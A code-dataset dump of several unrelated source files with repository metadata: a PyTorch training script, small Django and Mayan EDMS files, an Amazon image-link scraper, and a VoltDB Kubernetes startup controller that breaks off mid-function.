int(total_train_time//3600), int((total_train_time%3600)//60), total_train_time%60))
return best_acc1
def train(opt, train_loader, **kwargs):
r"""Train model each epoch
"""
epoch = kwargs.get('epoch')
model = kwargs.get('model')
criterion = kwargs.get('criterion')
optimizer = kwargs.get('optimizer')
batch_time = AverageMeter('Time', ':6.3f')
data_time = AverageMeter('Data', ':6.3f')
losses = AverageMeter('Loss', ':.4e')
top1 = AverageMeter('Acc@1', ':6.2f')
top5 = AverageMeter('Acc@5', ':6.2f')
progress = ProgressMeter(len(train_loader), batch_time, data_time,
losses, top1, top5, prefix="Epoch: [{}]".format(epoch))
# switch to train mode
model.train()
end = time.time()
for i, (input, target) in enumerate(train_loader):
# measure data loading time
data_time.update(time.time() - end)
if opt.cuda:
target = target.cuda(non_blocking=True)
# compute output
output = model(input)
loss = criterion(output, target)
# option 1) add total variation loss
if opt.tv_loss:
regularizer = new_regularizer(opt, model, 'tv')
loss += regularizer
# measure accuracy and record loss
acc1, acc5 = accuracy(output, target, topk=(1, 5))
losses.update(loss.item(), input.size(0))
top1.update(acc1[0], input.size(0))
top5.update(acc5[0], input.size(0))
# compute gradient and do SGD step
optimizer.zero_grad()
loss.backward()
optimizer.step()
# measure elapsed time
batch_time.update(time.time() - end)
if i % opt.print_freq == 0:
progress.print(i)
end = time.time()
print('====> Acc@1 {top1.avg:.3f} Acc@5 {top5.avg:.3f}'
.format(top1=top1, top5=top5))
# logging at sacred
ex.log_scalar('train.loss', losses.avg, epoch)
ex.log_scalar('train.top1', top1.avg.item(), epoch)
ex.log_scalar('train.top5', top5.avg.item(), epoch)
return top1.avg, top5.avg
def validate(opt, val_loader, epoch, model, criterion):
r"""Validate model each epoch and evaluation
"""
batch_time = AverageMeter('Time', ':6.3f')
losses = AverageMeter('Loss', ':.4e')
top1 = AverageMeter('Acc@1', ':6.2f')
top5 = AverageMeter('Acc@5', ':6.2f')
progress = ProgressMeter(len(val_loader), batch_time, losses, top1, top5,
prefix='Test: ')
# switch to evaluate mode
model.eval()
with torch.no_grad():
end = time.time()
for i, (input, target) in enumerate(val_loader):
if opt.cuda:
target = target.cuda(non_blocking=True)
# compute output
with profiler.profile(use_cuda=True, profile_memory=True, record_shapes=True) as prof:
output = model(input)
loss = criterion(output, target)
# measure accuracy and record loss
acc1, acc5 = accuracy(output, target, topk=(1, 5))
losses.update(loss.item(), input.size(0))
top1.update(acc1[0], input.size(0))
top5.update(acc5[0], input.size(0))
# measure elapsed time
batch_time.update(time.time() - end)
if i % opt.print_freq == 0:
progress.print(i)
end = time.time()
print('====> Acc@1 {top1.avg:.3f} Acc@5 {top5.avg:.3f}'
.format(top1=top1, top5=top5))
print(prof.key_averages().table(sort_by="cuda_memory_usage"))
# logging at sacred
ex.log_scalar('test.loss', losses.avg, epoch)
ex.log_scalar('test.top1', top1.avg.item(), epoch)
ex.log_scalar('test.top5', top5.avg.item(), epoch)
return top1.avg, top5.avg
def new_regularizer(opt, model, regularizer_name='tv'):
r"""Add new regularizer
Arguments
---------
regularizer_name (str): name of regularizer
- 'tv': total variation loss (https://towardsdatascience.com/pytorch-implementation-of-perceptual-losses-for-real-time-style-transfer-8d608e2e9902)
"""
# get all convolution weights and reshape
if opt.arch in hasDWConvArchs:
try:
num_layer = model.module.get_num_dwconv_layer()
conv_all = model.module.get_layer_dwconv(0).weight
except:
num_layer = model.get_num_dwconv_layer()
conv_all = model.get_layer_dwconv(0).weight
conv_all = conv_all.view(len(conv_all), -1)
for i in range(1, num_layer):
try:
conv_cur = model.module.get_layer_dwconv(i).weight
except:
conv_cur = model.get_layer_dwconv(i).weight
conv_cur = conv_cur.view(len(conv_cur), -1)
conv_all = torch.cat((conv_all, conv_cur), 0)
else:
try:
num_layer = model.module.get_num_conv_layer()
conv_all = model.module.get_layer_conv(0).weight.view(-1, 9)
except:
num_layer = model.get_num_conv_layer()
conv_all = model.get_layer_conv(0).weight.view(-1, 9)
for i in range(1, num_layer):
try:
conv_cur = model.module.get_layer_conv(i).weight.view(-1, 9)
except:
conv_cur = model.get_layer_conv(i).weight.view(-1, 9)
conv_all = torch.cat((conv_all, conv_cur), 0)
if arch_name in hasPWConvArchs:
try:
num_pwlayer = model.module.get_num_pwconv_layer()
pwconv_all = model.module.get_layer_pwconv(0).weight
except:
num_pwlayer = model.get_num_pwconv_layer()
pwconv_all = model.get_layer_pwconv(0).weight
pwconv_all = pwconv_all.view(-1, opt.pw_bind_size)
for i in range(1, num_pwlayer):
try:
pwconv_cur = model.module.get_layer_pwconv(i).weight
except:
pwconv_cur = model.get_layer_pwconv(i).weight
pwconv_cur = pwconv_cur.view(-1, opt.pw_bind_size)
pwconv_all = torch.cat((pwconv_all, pwconv_cur), 0)
if regularizer_name == 'tv':
regularizer = torch.sum(torch.abs(conv_all[:, :-1] - conv_all[:, 1:])) + torch.sum(torch.abs(conv_all[:-1, :] - conv_all[1:, :]))
if arch_name in hasPWConvArchs:
regularizer += torch.sum(torch.abs(pwconv_all[:, :-1] - pwconv_all[:, 1:])) + torch.sum(torch.abs(pwconv_all[:-1, :] - pwconv_all[1:, :]))
regularizer = opt.tvls * regularizer
else:
regularizer = 0.0
raise NotImplementedError
return regularizer
if __name__ == '__main__':
start_time = time.time()
ex.run()
elapsed_time = time.time() - start_time
print('====> total time: {}h {}m {:.2f}s'.format(
int(elapsed_time//3600), int((elapsed_time%3600)//60), elapsed_time%60))
| [
"ho7719@gmail.com"
] | ho7719@gmail.com |
7fd63d245dbd1ed1b3c96be002435fe20c90baf8 | 44bbfe1c9a7f16e632cdd27c2de058033b33ea6d | /mayan/apps/authentication/links.py | dc7385bd9ff9101a3656851017b7786194679579 | [
"Apache-2.0"
] | permissive | lxny2004/open-paperless | 34025c3e8ac7b4236b0d8fc5ca27fc11d50869bc | a8b45f8f0ee5d7a1b9afca5291c6bfaae3db8280 | refs/heads/master | 2020-04-27T04:46:25.992405 | 2019-03-06T03:30:15 | 2019-03-06T03:30:15 | 174,064,366 | 0 | 0 | NOASSERTION | 2019-03-06T03:29:20 | 2019-03-06T03:29:20 | null | UTF-8 | Python | false | false | 478 | py | from __future__ import unicode_literals
from django.utils.translation import ugettext_lazy as _
from navigation import Link
def has_usable_password(context):
return context['request'].user.has_usable_password
link_logout = Link(
icon='fa fa-sign-out', text=_('Logout'), view='authentication:logout_view'
)
link_password_change = Link(
condition=has_usable_password, icon='fa fa-key', text=_('Change password'),
view='authentication:password_change_view'
)
| [
"littlezhoubear@gmail.com"
] | littlezhoubear@gmail.com |
1cf00f3de1525c671dd6fd82eb8540bb1d901ff0 | 1efdff241b82221e633bf93d1745f6c852df287b | /attendance/attendance/webscraping.py | 9d35a78e9df37466025f2aa177b51ce7b3f51813 | [] | no_license | dhruv-kabariya/attend | 6b84821e9889dfd366a4d14fc104ffb50bcce1aa | fc4fb8565146ceb1bf86c81b4ea7afb2a74f41f8 | refs/heads/master | 2020-08-12T13:34:49.041054 | 2020-02-29T13:13:53 | 2020-02-29T13:13:53 | 214,776,382 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 561 | py | from bs4 import BeautifulSoup as soup
from urllib.request import urlopen, Request
import time
search = input()
mu_url = "https://www.amazon.in/s?k="+search+"&ref=nb_sb_noss"
req = Request(mu_url)
page_code = urlopen(mu_url)
code = page_code.read()
page_code.close()
page_soup = soup(code, 'html.parser')
divs = page_soup.findAll(
"div", {"class": "a-section a-spacing-medium"})
photo_links = []
# print(divs[2])
for i in divs:
link = i.findAll(
"img")
# photo = link["src"]
photo_links.append(link[0]["src"])
print(photo_links[1])
| [
"dhruvkabariya1@gmail.com"
] | dhruvkabariya1@gmail.com |
890373e747027f7865371d1230e88bca75d7b9be | f0e3ba0707d8db85afa50701b739b570259236ca | /ppts/apps.py | 083527dbb919b18619df6ea1b4dbb874ebc2d59c | [
"MIT"
] | permissive | Tubbz-alt/planningportal | bb3ff20ea3a730ccc2ca2ebef9e76198d5df8869 | ef8ed9e604c2ff7fb88836247aaa8eba0cfa235f | refs/heads/master | 2022-12-24T14:42:18.925112 | 2019-07-14T22:26:15 | 2019-07-14T22:26:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 83 | py | from django.apps import AppConfig
class PptsConfig(AppConfig):
name = 'ppts'
| [
"steven.buss@gmail.com"
] | steven.buss@gmail.com |
97653dade3c09365113a5b85661c09ce7269226c | 6316b0092623c3f9fc8a0077f8d791bf8fb661e3 | /kubernetes/instance/deployment/bin/voltboot | 548695924be97358360777d0f5c6699263d53de1 | [] | no_license | litesoft-go/MockVoltDBcluster | 2d0d0f64afeb3cfc8ef61e714ff42b4c777f199d | bdd63e2318bf4d050e74b030c7908cf3358a5af6 | refs/heads/master | 2022-08-27T23:38:27.050344 | 2020-05-28T16:02:29 | 2020-05-28T16:02:29 | 253,620,624 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 29,279 | #!/usr/bin/env python
# -*-mode: python-*-
# This file is part of VoltDB.
# Copyright (C) 2020 VoltDB Inc.
# VoltDB Kubernetes node startup controller
# for use with the VoltDB operator for Kubernetes
#
# Environment variables understood by voltboot:
#
# +-----Variable name----------------+----Default value------+
# | VOLTDB_INIT_VOLUME | /etc/voltdb |
# | VOLTDB_K8S_ADAPTER_ADMIN_PORT | 8080 |
# | VOLTDB_K8S_ADAPTER_FQHOSTNAME | from socket.getfqdn() |
# | VOLTDB_K8S_ADAPTER_INTERNAL_PORT | 3021 |
# | VOLTDB_K8S_ADAPTER_PVVOLTDBROOT | /voltdbroot |
# | VOLTDB_K8S_ADAPTER_STATUS_PORT | 11780 |
# | VOLTDB_K8S_ADAPTER_VOLTBOOT_PORT | 11235 |
# | VOLTDB_CONNECTION_HOST | |
# +----------------------------------+-----------------------+
import logging
import os
import re
import shlex
import socket
import subprocess
import sys
import random
from flask import Flask, request
from werkzeug.exceptions import BadRequest, InternalServerError
from tempfile import mkstemp
from threading import Thread, Lock
from time import time, sleep, strftime, gmtime, localtime, timezone
from traceback import format_exc
# Mount point for persistent volume 'voltdbroot'
PV_MOUNTPT = os.getenv('VOLTDB_K8S_ADAPTER_PVVOLTDBROOT', '/voltdbroot')
# Hardwired name of voltdbroot directory (which is the VoltDB default)
VOLTDBROOT = 'voltdbroot'
# Assets directory: mounted by config maps
ASSETS_DIR = os.path.join(os.getenv('VOLTDB_INIT_VOLUME', '/etc/voltdb'))
# Ports used by this program for 'node up?' testing
VOLTDB_INTERNAL_INTERFACE = int(os.getenv('VOLTDB_K8S_ADAPTER_INTERNAL_PORT', 3021))
VOLTDB_HTTP_PORT = int(os.getenv('VOLTDB_K8S_ADAPTER_ADMIN_PORT', 8080))
VOLTDB_STATUS_PORT = int(os.getenv('VOLTDB_K8S_ADAPTER_STATUS_PORT', 11780))
VOLTBOOT_PORT = int(os.getenv('VOLTDB_K8S_ADAPTER_VOLTBOOT_PORT', 11235))
# URL for --host instead of hunting for it
VOLTDB_CONNECTION_HOST = os.getenv('VOLTDB_CONNECTION_HOST')
# Time spent waiting to see if voltdb has really started (distinguishes
# 'start failed' from 'crashed')
START_WAIT = 2
# Time spent waiting for DNS to have our own name (avoids waiting forever
# if there is a bug somewhere)
DNS_WAIT = 10
# Exceptions
class ForbiddenArgException(Exception):
pass
class VoltInitException(Exception):
pass
class VoltStartException(Exception):
pass
####
# Global data.
# Most accesses are from synchronous server code.
# The exception is STATE, which may be updated from
# a background monitoring thread, thus the lock.
HOSTINFO = None
FQHOSTNAME = None
SERVER = None
WORKING_DIR = None
VOLTBOOT_DIR = None
RESTART_ARGS = None
RESTART_NAME = None
STARTED_NAME = None
STATE = None
ST_UNINIT = 'uninitialized'
ST_STARTING = 'starting'
ST_STARTFAIL = 'start-failed'
ST_RUNNING = 'running'
ST_STOPPED = 'stopped'
ST_CRASHED = 'crashed'
state_lock = Lock()
def set_state(state):
global STATE
state_lock.acquire()
try:
if STATE != state:
STATE = state
logging.info("VoltDB state is now '%s'", state)
finally:
state_lock.release()
def set_state_if(old_state, new_state):
global STATE
state_lock.acquire()
try:
if STATE == old_state:
STATE = new_state
logging.info("VoltDB state is now '%s'", new_state)
finally:
state_lock.release()
####
# Main program code: a simple REST server
# that drives all activity. Loops forever.
def main():
global HOSTINFO, FQHOSTNAME, SERVER, WORKING_DIR, VOLTBOOT_DIR, \
RESTART_ARGS, RESTART_NAME, STARTED_NAME, STATE
# See if the persistent storage mount exists
if not os.path.exists(PV_MOUNTPT):
logging.error("Persistent volume '%s' is not mounted", PV_MOUNTPT)
sys.exit(1)
# Parse our own hostname, of known format, to get useful data about cluster
FQHOSTNAME = get_fqhostname()
HOSTINFO = split_fqhostname(FQHOSTNAME)
if HOSTINFO is None:
logging.error("Hostname parse error, unexpected form: '%s'", FQHOSTNAME)
sys.exit(1)
ssname, pod_ordinal, my_hostname, domain = HOSTINFO
if type(pod_ordinal) != type(0):
logging.error("Hostname parse error, expected numeric pod ordinal: '%s'", pod_ordinal)
sys.exit(1)
# Set up logger, log startup banner
setup_logging(ssname)
logging.info("==== VoltDB startup controller for Kubernetes ====")
logging.info("GMT is: " + strftime("%Y-%m-%d %H:%M:%S", gmtime()) +
" LOCALTIME is: " + strftime("%Y-%m-%d %H:%M:%S", localtime()) +
" TIMEZONE OFFSET is: " + str(timezone))
if logging.getLogger().isEnabledFor(logging.DEBUG):
logging.debug("Environment:")
for k, v in os.environ.items():
logging.debug(" %s = %s", k, v)
logging.debug("Current dir: %s", os.getcwd())
logging.info("Host: %s", FQHOSTNAME)
logging.info("Pod: %s-%s", ssname, pod_ordinal)
# The persistent volume (PV) is mounted on to a directory we know as PV_MOUNTPT.
# In that directory, i.e., in the root of the PV, we will create a container-
# specific directory with an arbitrary name (see initialization below). This
# directory is the working directory for the rest of the present program; it
# is signficant because it (the working directory) is the directory in which
# 'voltdb init' creates the voltdbroot directory, and in which 'voltdb start'
# expects to find the voltdb directory.
#
# Since the name of the working directory is arbitrary, we set up a symbolic
# link in the root of the PV, named after the stateful set, and pointing to
# the working directory.
#
# Voltboot gets its own directory under the working directory. This is used
# to store restart command info and anything else specific to voltboot.
WORKING_DIR = os.path.join(PV_MOUNTPT, ssname)
VOLTBOOT_DIR = os.path.join(WORKING_DIR, 'voltboot')
if os.path.exists(os.path.join(WORKING_DIR, VOLTDBROOT, '.initialized')):
os.chdir(WORKING_DIR)
logging.info("Working directory is: %s", WORKING_DIR)
(RESTART_ARGS, RESTART_NAME) = load_restart_args()
if RESTART_ARGS:
auto_restart(RESTART_ARGS, RESTART_NAME)
else:
set_state(ST_STOPPED)
else:
set_state(ST_UNINIT)
# Set up web server. All error responses are reported by
# an HTTP exception. We intercept the exception and
# turn it into a string-and-status; this prevents the
# default handling that returns (ugh) an HTML page.
class VoltbootServer(Flask):
def handle_http_exception(env, ex):
logging.error("%s (%s)", ex.description, ex.code)
return ex.description, ex.code
def handle_exception(env, ex):
logging.error("Unhandled: %s", ex.args[0])
return ex.args[0], 500
SERVER = VoltbootServer('voltboot')
# Endpoint processing follows. The pattern is that
# we handle the request parsing here, then call a
# processing routine that has approriate exeception
# handlers for all expected cases.
@SERVER.route('/status', methods=['GET'])
def get_status():
state = STATE # read once, we hope
logging.debug("GET /status in state '%s'", state)
resp = status_response(state, STARTED_NAME, RESTART_NAME)
if state == ST_CRASHED: # need liveness check to fail
return (resp, 424) # "failed dependency"
else:
return resp
@SERVER.route('/start', methods=['POST'])
def post_start():
logging.debug("POST /start in state '%s'", STATE)
req = request.get_json(force=True, cache=False) # may raise 400 exception
start_cmd = command_parts(req, 'startCommand', True)
restart_cmd = command_parts(req, 'restartCommand', False)
init_and_start(start_cmd, restart_cmd)
return status_response(STATE, STARTED_NAME, RESTART_NAME)
@SERVER.route('/restart-command', methods=['POST'])
def post_restart_cmd():
logging.debug("POST /restart-command")
req = request.get_json(force=True, cache=False) # may raise 400 exception
restart_cmd = command_parts(req, 'restartCommand', True)
update_restart_cmd(restart_cmd[0], restart_cmd[1])
return restart_response(RESTART_ARGS, RESTART_NAME)
@SERVER.route('/restart-command', methods=['DELETE'])
def delete_restart_cmd():
logging.debug("DELETE /restart-command")
prev_args = RESTART_ARGS
prev_name = RESTART_NAME
update_restart_cmd(None, None)
return restart_response(prev_args, prev_name)
@SERVER.route('/restart-command', methods=['GET'])
def get_restart_cmd():
logging.debug("GET /restart-command")
return restart_response(RESTART_ARGS, RESTART_NAME)
# And start serving
logging.info("Ready for commands ...")
cli = sys.modules['flask.cli']
cli.show_server_banner = lambda *x: None
SERVER.run(host='0.0.0.0', port=VOLTBOOT_PORT, debug=False, load_dotenv=False)
def status_response(state, started_name, restart_name):
resp = { "status": state }
if started_name:
resp.update({ "startedName": started_name })
if restart_name:
resp.update({ "restartName": restart_name })
return resp
def command_parts(req, name, mandatory):
obj = {}
if name in req:
obj = req[name]
elif mandatory:
raise BadRequest(name + ' object is required')
if type(obj) != type({}):
raise BadRequest(name + ' must be a JSON object {...}')
args = normalize_args(_json_array(obj, 'args'))
name = _json_string(obj, 'name')
return (args, name)
def _json_array(obj, name):
arr = obj[name] if name in obj else []
if type(arr) != type([]):
raise BadRequest(name + ' must be a JSON array [...]')
return arr
def _json_string(obj, name):
txt = obj[name] if name in obj else ''
if type(txt) != type('') and type(txt) != type(u''):
raise BadRequest(name + ' must be a JSON string "..."')
return txt
def init_and_start(start_cmd, restart_cmd):
try:
start_args = start_cmd[0]
start_name = start_cmd[1]
restart_args = restart_cmd[0]
restart_name = restart_cmd[1]
check_forbidden_args(start_args)
check_forbidden_args(restart_args)
if STATE == ST_RUNNING or STATE == ST_STARTING:
raise BadRequest("Start not valid in state '%s'" % STATE)
if STATE == ST_UNINIT:
init_voltdb()
set_state(ST_STARTING)
start_voltdb(start_args, start_name)
save_restart_cmd(restart_args, restart_name)
except ForbiddenArgException as e:
raise BadRequest(e.args[0])
except VoltInitException as e:
raise InternalServerError(e.args[0])
except VoltStartException as e:
set_state_if(ST_STARTING, ST_STARTFAIL)
raise InternalServerError(e.args[0])
except BadRequest:
raise
except Exception as e:
logging.error("Unexpected exception: %s", e)
set_state_if(ST_STARTING, ST_STARTFAIL)
raise InternalServerError("Unexpected exception", e.args[0], e)
def auto_restart(restart_args, restart_name):
try:
set_state(ST_STARTING)
start_voltdb(restart_args, restart_name)
except VoltStartException as e:
set_state_if(ST_STARTING, ST_STARTFAIL)
raise InternalServerError(e.args[0])
except Exception as e:
logging.error("Unexpected exception: %s", e)
set_state_if(ST_STARTING, ST_STARTFAIL)
raise InternalServerError("Unexpected exception", e.args[0], e)
####
# VoltDB initialization
def init_voltdb(force=False):
logging.info("Initializing a new VoltDB database in '%s'", WORKING_DIR)
ssname, pod_ordinal, my_hostname, domain = HOSTINFO
# Remove any old symlink
os.chdir(PV_MOUNTPT)
try:
os.unlink(ssname)
except:
pass
# Create working dir with arbitrary but unique name
workdir_unique = 'VDBR-' + str(pod_ordinal) + '-' + str(int(time()*1e6)) + '.' + domain
os.mkdir(workdir_unique)
# Add symlink to PV root
os.symlink(workdir_unique, ssname)
# Construct voltdb command string
os.chdir(workdir_unique)
cmd = ['voltdb', 'init']
if force:
cmd.append('--force')
if os.path.isdir(ASSETS_DIR):
deployment_file = os.path.join(ASSETS_DIR, 'deployment')
if os.path.isfile(deployment_file):
cmd.append('--config')
cmd.append(deployment_file)
classes_dir = os.path.join(ASSETS_DIR, 'classes')
l = get_files_list(classes_dir)
if l is not None:
cmd.append('--classes')
cmd.append(','.join(l))
schema_dir = os.path.join(ASSETS_DIR, 'schema')
l = get_files_list(schema_dir)
if l is not None:
cmd.append('--schema')
cmd.append(','.join(l))
# Run voltdb and wait for it to finish (does local
# work only, so wait should not be too long)
logging.info("Executing VoltDB init command: %s", cmd)
logging.info(" in working directory: %s", os.getcwd())
sys.stdout.flush()
sys.stderr.flush()
try:
sp = subprocess.Popen(cmd, shell=False)
sp.wait()
except Exception as e:
raise VoltInitException("Failed to run 'voltdb init' command: %s" % e)
if sp.returncode != 0:
raise VoltInitException("Failed to initialize VoltDB database in '%s'" % WORKING_DIR)
marker = os.path.join(WORKING_DIR, VOLTDBROOT, '.initialized')
if not os.path.exists(marker):
raise VoltInitException("VoltDB initialization succeeded but marker file '%s' was not created" % marker)
logging.info("Initialization of new VoltDB database is complete")
setup_logging(ssname) # logging changes to use new directory
os.chdir(WORKING_DIR)
logging.info("Working directory is now: %s", WORKING_DIR)
# Create scratch directory for voltboot
os.mkdir(VOLTBOOT_DIR)
def get_files_list(dir):
# skip files starting with .., such as ..data, that k8s puts in configmaps
files = [f for f in os.listdir(dir) if not f.startswith('..')]
if len(files) > 1:
plf = os.path.join(dir, '.loadorder')
if os.path.exists(plf):
with open(plf, 'r') as f:
fl = f.readline().strip().split(',')
fqpl = map(lambda x: os.path.join(dir, x), fl)
else:
fqpl = [ dir + '/*', ]
return fqpl
elif len(files) == 1:
return [ os.path.join(dir, files[0]) ]
return None
###
# Start VOLTDB running in subprocess
# State is set to STARTING prior to entry
# and will be RUNNING or STARTFAIL on return
def start_voltdb(args, name):
global STARTED_NAME
STARTED_NAME = name
# Find hosts in our cluster
ssname, pod_ordinal, my_hostname, domain = HOSTINFO
connect_hosts = discover_pods(FQHOSTNAME, domain, ssname, pod_ordinal)
# Override some command arguments
if os.path.isdir(ASSETS_DIR):
license_file = os.path.join(ASSETS_DIR, 'license') # FIXME license handling moves to init soon
if os.path.isfile(license_file): # TODO: this causes problems somewhere... dave to figure it out
add_or_replace_arg(args, '-l,--license', license_file)
add_or_replace_arg(args, '-H,--host', random.choice(connect_hosts))
add_or_replace_arg(args, '--status', str(VOLTDB_STATUS_PORT))
# In voltdbroot/config/path.properties the paths may contain
# references to voltdbroot. Ensure they always use the correct
# symlink.
propdir = os.path.join(VOLTDBROOT, 'config')
propfile = os.path.join(VOLTDBROOT, 'config', 'path.properties')
res = '=(.*)/.+?\.' + domain.replace('.','\.') +'/'
cre = re.compile(res, flags=re.MULTILINE)
with open(propfile, 'r') as f:
lines = f.read()
if len(lines) == 0:
raise VoltStartException("File '%s' is empty" % propfile)
lines = cre.sub('=\g<1>/'+ssname+'/', lines)
tfd, tmpfilepath = mkstemp(dir=propdir)
with os.fdopen(tfd, 'w') as f2:
f2.write(lines)
os.rename(tmpfilepath, propfile)
# Build the voltdb start command line
cmd = ['voltdb', 'start']
cmd.extend(args)
logging.info("Executing VoltDB start command: %s", cmd)
logging.info(" in working directory: %s", os.getcwd())
# Flush so we see our output in k8s logs
sys.stdout.flush()
sys.stderr.flush()
# Start voltdb in subprocess (voltdb cli eventually
# execs the actual VoltDB program in a JVM)
try:
sp = subprocess.Popen(cmd, shell=False)
except Exception as e:
raise VoltStartException("Failed to run 'voltdb start' command: %s" % e)
# Wait a little to see if voltdb starts ok
t0 = time()
while True:
if sp.poll() is not None:
set_state(ST_STARTFAIL)
raise VoltStartException("VoltDB was started and immediately terminated")
if time()-t0 >= START_WAIT:
break
sleep(0.5)
logging.info("VoltDB started as process id %d", sp.pid)
set_state(ST_RUNNING)
# Now run a monitoring thread. This may asynchronously
# change the state to show that VoltDB has terminated.
def voltdb_monitor(proc):
logging.debug("Monitoring thread started")
excode = None
try:
excode = proc.wait()
except Exception as e:
logging.error("Monitoring thread error: %s", e)
excode = -1
if excode == 0:
logging.info("VoltDB process terminated normally")
set_state_if(ST_RUNNING, ST_STOPPED)
else:
logging.error("VoltDB process terminated abnormally")
set_state_if(ST_RUNNING, ST_CRASHED)
logging.debug("Monitoring thread terminated")
th = Thread(target=voltdb_monitor, args=(sp,))
th.daemon = True
th.start()
# Find nodes which have the mesh port open and which respond to HTTP traffic
# Nodes may be "published before they are ready to receive traffic"
def discover_pods(fqhostname, domain, ssname, pod_ordinal):
if VOLTDB_CONNECTION_HOST is not None:
cluster_pods_up = [VOLTDB_CONNECTION_HOST]
return cluster_pods_up
tstart = time()
tlog = 0
seen_own_name = False
logging.info("This is %s-%s", ssname, pod_ordinal)
while True:
cluster_pods = query_dns_srv(domain)
if fqhostname in cluster_pods: # remove ourself
cluster_pods.remove(fqhostname)
if not seen_own_name:
logging.info("Own name seen in DNS results: %s", fqhostname)
seen_own_name = True
cluster_pods_responding_mesh = []
cluster_pods_up = []
# Test connectivity to all named pods
for host in cluster_pods:
logging.info("Testing connection to '%s'", host)
if try_to_connect(host, VOLTDB_INTERNAL_INTERFACE):
cluster_pods_responding_mesh.append(host)
# We may have found a running node, try the HTTP API
if try_to_connect(host, VOLTDB_HTTP_PORT):
cluster_pods_up.append(host)
logging.debug("Database nodes up: %s", cluster_pods_up)
logging.debug("Mesh ports responding: %s", cluster_pods_responding_mesh)
# If the database is up use all that are available
if len(cluster_pods_up) > 0:
return cluster_pods_up
# If the database is down
# - forming initial mesh we direct the connection request to host0
# - bring up pods in an orderly fashion, one at a time
mesh_count = len(cluster_pods_responding_mesh)
if mesh_count >= pod_ordinal:
logging.debug("Mesh count %d >= pod ordinal %d", mesh_count, pod_ordinal)
return [ ssname + '-0.' + domain ]
break
# If we haven't seen our own name after a few seconds,
# surely something is broken.
tnow = time()
if not seen_own_name and tnow > tstart + DNS_WAIT:
raise VoltStartException("DNS results don't contain our name: %s" % fqhostname)
# Log lack of progress, but infrequently
if tnow > tlog + 30:
logging.info("Waiting for mesh to form")
tlog = tnow
sleep(1)
# DNS lookup. Voltdb stateful set pods are registered on startup not on readiness.
# SRV gives us records for each node in the cluster domain like
# _service._proto.name. TTL class SRV priority weight port target.
# Returns a list of fq hostnames of pods in the service domain
def query_dns_srv(query):
m_list = []
try:
logging.debug("DNS lookup: %s", query)
cmd = "nslookup -type=SRV %s | awk '/^%s/ {print $NF}'" % ((query,)*2)
answers = subprocess.check_output(cmd, shell=True)
logging.debug("Answers: %s", answers)
except Exception as e:
logging.error("DNS query error: %s", e)
return m_list
for rdata in answers.split('\n'):
if len(rdata):
m_list.append(rdata.split(' ')[-1][:-1]) # drop the trailing '.'
logging.debug("Results: %s", m_list)
return sorted(m_list)
def try_to_connect(host, port):
s = socket.socket()
try:
logging.debug("Trying to connect to '%s:%d'", host, port )
s.connect((host, port))
logging.debug("Connected")
return True
except Exception as e:
logging.debug(str(e))
return False
finally:
s.close()
####
# Restart command utilities
def update_restart_cmd(arg_list, name):
if STATE == ST_UNINIT:
raise BadRequest("Request not valid in '%s' state" % STATE)
try:
if arg_list:
check_forbidden_args(arg_list)
save_restart_cmd(arg_list, name)
except ForbiddenArgException as e:
raise BadRequest(e.args[0])
except BadRequest:
raise
except Exception as e:
logging.error("Unexpected exception: %s", e)
raise InternalServerError("Unexpected exception", e.args[0], e)
def save_restart_cmd(arg_list, name):
global RESTART_ARGS, RESTART_NAME
if not arg_list and not name:
RESTART_ARGS = None
RESTART_NAME = None
_remove_restart_file()
elif arg_list != RESTART_ARGS or name != RESTART_NAME:
RESTART_ARGS = arg_list
RESTART_NAME = name
logging.info("Restart command set: name '%s', args %s", name, arg_list)
_write_restart_file(arg_list, name)
RESTART_FILE_MAGIC='##VOLT 1'
def _write_line(f, t):
if t is None:
f.write('\n')
else:
f.write(t + '\n')
def _write_restart_file(arg_list, name):
path = os.path.join(VOLTBOOT_DIR, 'restart-command')
try:
with open(path, 'w') as f:
_write_line(f, RESTART_FILE_MAGIC)
_write_line(f, name)
if arg_list:
for a in arg_list:
_write_line(f, a)
except EnvironmentError as e:
logging.warning("Failed to write to %s: %s", path, e)
def _remove_restart_file():
path = os.path.join(VOLTBOOT_DIR, 'restart-command')
try:
os.unlink(path)
except EnvironmentError as e:
if e.errno != 2: # 'file not found' is ok
logging.warning("Failed to remove %s: %s", path, e)
def _read_lines(f):
lines = f.readlines();
return [ line.strip() for line in lines ]
def load_restart_args():
path = os.path.join(VOLTBOOT_DIR, 'restart-command')
data = None
name = None
try:
with open(path, 'r') as f:
lines = _read_lines(f)
if lines[0] == RESTART_FILE_MAGIC:
name = lines[1]
data = [ line for line in lines[2:] ]
logging.info("Loaded restart command: name '%s', args %s", name, data)
except EnvironmentError as e:
if e.errno == 2: # 'file not found' is ok
logging.debug("Not found: %s", path)
else:
logging.warning("Failed to load %s: %s", path, e)
return (data, name)
def restart_response(arg_list, name):
cmd = {}
if arg_list:
cmd.update({ "args": arg_list })
if name:
cmd.update({ "name": name })
return { "restartCommand": cmd } if cmd else {}
####
# Command-line parsing utilities
# Normalize args
# - if yaml file contains $(FOO) and configset does not define FOO then the args
# will contain a literal "$(FOO)" which we do not want.
# - some of our "args" might be environment strings of args; if so break them
# up for the shell
def normalize_args(args):
logging.debug("normalize_args in: %s", args)
nargs = []
omit = re.compile(R'^\$\(\w+\)$')
for a in args:
if omit.match(a):
logging.info("Omitting unsubstituted variable: %s", a)
elif ' ' in a:
nargs.extend(str_to_arg_list(a))
else:
nargs.append(a)
logging.debug("normalize_args out: %s", args)
return nargs
# Replaces "foo bar=mumble" by [foo, bar, mumble]
def str_to_arg_list(text):
logging.debug("str_to_arg_list in: %s", text)
al = []
for a in shlex.split(text.strip("'\"")):
if '=' in a:
al.extend(a.split('=', 1))
else:
al.append(a)
logging.debug("str_to_arg_list out: %s", al)
return al
# Filter out arguments that are valid for voltdb start
# but which are not allowed here
FORBIDDEN_ARGS = ['--version',
'-h', '--help',
'-D', '--dir',
'-f', '--force',
'-B', '--background',
'-r', '--replica']
def check_forbidden_args(args):
logging.debug("check_forbidden_args: %s", args)
bad = []
for a in args:
if a in FORBIDDEN_ARGS:
bad.append(a)
if bad:
tmp = ('' if len(bad) == 1 else 's', ', '.join(bad))
raise ForbiddenArgException("Unsupported argument%s: %s" % tmp)
def add_or_replace_arg(args, option, value):
# Option is comma-separated list of option formats to be treated equally,
# e.g. '-L,--license'. We assume that only one of the option formats is present
options = option.split(',')
for op in options:
ix = find_arg_index(args, op)
if ix is not None:
break
if ix is None: # add
